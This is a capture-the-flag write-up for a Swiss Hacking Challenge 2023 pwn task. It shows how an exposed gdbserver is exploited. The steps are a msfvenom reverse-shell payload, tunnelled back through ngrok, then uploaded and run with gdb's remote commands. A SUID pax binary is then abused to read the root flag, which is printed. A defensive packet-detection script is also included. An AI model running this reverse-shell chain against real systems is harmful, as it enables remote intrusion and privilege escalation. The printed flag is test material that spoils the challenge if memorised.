Swiss Hacking Challenge 2023 - gerts data brotocol

Posted on Apr 25, 2023

Information

Challenge category: pwn

Challenge Description

Gert was a brilliant programmer who had just developed a new data protocol that promised to revolutionize the industry. He named it “Gert’s Data Brotocol,” or GDB for short. Excited about his invention, Gert sent out emails to all the major tech companies, hoping to create a secure partnership. But despite his best efforts, no one seemed interested in opening GDB to the public. Disheartened, Gert decided to take matters into his own hands and created a startup to launch GDB himself.

Target

We are given access to a socket address. At first nothing seems to respond, but based on the challenge name we can assume it is a gdbserver that we can connect to.

Exploitation

Getting a reverse shell

The following section is taken from HackTricks

We use msfvenom to generate a reverse shell payload, then run gdb, connect to the remote server and get a reverse shell. Use ngrok or something equivalent to open up a port on your local machine that the shell can connect to:

# On your local machine
nc -lvp 4444
ngrok tcp 4444
# Generating the payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<NGROK_IP> LPORT=<NGROK_PORT> PrependFork=true -f elf -o binary.elf

# Chmod so gdb can run it
chmod +x binary.elf

# Open it up in GDB
gdb binary.elf

# Set the target
target extended-remote chall.m0unt41n.ch:1337

# Upload it
remote put binary.elf /tmp/binary.elf

# Set the executable
set remote exec-file /tmp/binary.elf

# Run it
run

You should now have a reverse shell connection on your computer.
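As an added example (not from the write-up, HackTricks or GDB itself): the steps above leave a recognisable trace on the wire, because `remote put` and `run` on an extended-remote target are carried by the vFile:open/vFile:pwrite and vRun packets of the GDB remote serial protocol, with hex-encoded file names. The Python below parses that framing from a constructed byte capture and flags the packets a defender watching an exposed gdbserver port would care about; the flags/mode values in the sample are constructed.

```python
"""Flag GDB remote-serial-protocol packets that upload and launch a binary.
Frames are $<payload>#<cs>, <cs> = 8-bit sum of payload bytes as two hex digits.
`remote put` issues vFile:open/pwrite; `run` on extended-remote issues vRun."""
import re

# '#', '$', '}', '*' inside binary payloads are escaped, so a raw '#' ends a payload.
PACKET = re.compile(rb"\$(.*?)#([0-9a-fA-F]{2})", re.DOTALL)

def frame(payload: bytes) -> bytes:
    """Wrap a payload in RSP framing with a correct checksum."""
    return b"$" + payload + b"#" + b"%02x" % (sum(payload) & 0xFF)

def hexdecode(field: bytes) -> str:
    """File names in vFile/vRun packets are sent hex-encoded."""
    return bytes.fromhex(field.decode()).decode(errors="replace")

def parse_packets(stream: bytes):
    """Yield (payload, checksum_ok) for each framed packet in the stream."""
    for m in PACKET.finditer(stream):
        payload, cs = m.group(1), int(m.group(2), 16)
        yield payload, (sum(payload) & 0xFF) == cs

def suspicious_events(stream: bytes):
    """Return (event, path) pairs for remote file creation and process launch."""
    events = []
    for payload, ok in parse_packets(stream):
        if not ok:
            continue  # gdbserver would NAK a corrupt frame; ignore it
        if payload.startswith(b"vFile:open:"):
            name_hex = payload[len(b"vFile:open:"):].split(b",")[0]
            events.append(("file_open", hexdecode(name_hex)))
        elif payload.startswith(b"vRun;"):
            name_hex = payload[len(b"vRun;"):].split(b";")[0]
            events.append(("run", hexdecode(name_hex)))
    return events

# Constructed client-to-server traffic mirroring the write-up's gdb session.
ELF = b"/tmp/binary.elf".hex().encode()
SAMPLE = b"".join([
    frame(b"qSupported:multiprocess+;swbreak+"),
    frame(b"vFile:open:" + ELF + b",601,1b6"),  # constructed flags (WRONLY|CREAT|TRUNC), mode 0666
    frame(b"vFile:pwrite:3,0," + b"\x7fELF..."),
    frame(b"vFile:close:3"),
    frame(b"vRun;" + ELF),
])

if __name__ == "__main__":
    for event, path in suspicious_events(SAMPLE):
        print(f"{event}: {path}")
```

A file_open followed by a run of the same path from a client outside the expected debugging hosts is the pattern to alert on.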

Reading the flag

As the flag in /flag.txt belongs to the root user we can’t just read it. I use linPEAS to show privilege escalation vulnerabilities.

I noticed there’s a SUID binary called /usr/bin/pax, which isn’t usually there on an Ubuntu server.

I used the good old GTFOBins (amazing site btw) to show me how privileges of the binary can be abused if the SUID bit is set.

Flag

The flag can be read using pax -w /flag.txt

shc2023{R3m0te_Gd8_expl01t5_v1a_m3t4spl01t}

Conclusion

I took way too long on the root part as I overlooked the pax executable. I then found out by looking at the apt logs though. I only knew GTFOBins because of some Hack The Box write-ups I read in the past and I’m glad I could actually use some things I learned.

References

  1. https://book.hacktricks.xyz/network-services-pentesting/pentesting-remote-gdbserver
  2. https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
  3. https://gtfobins.github.io/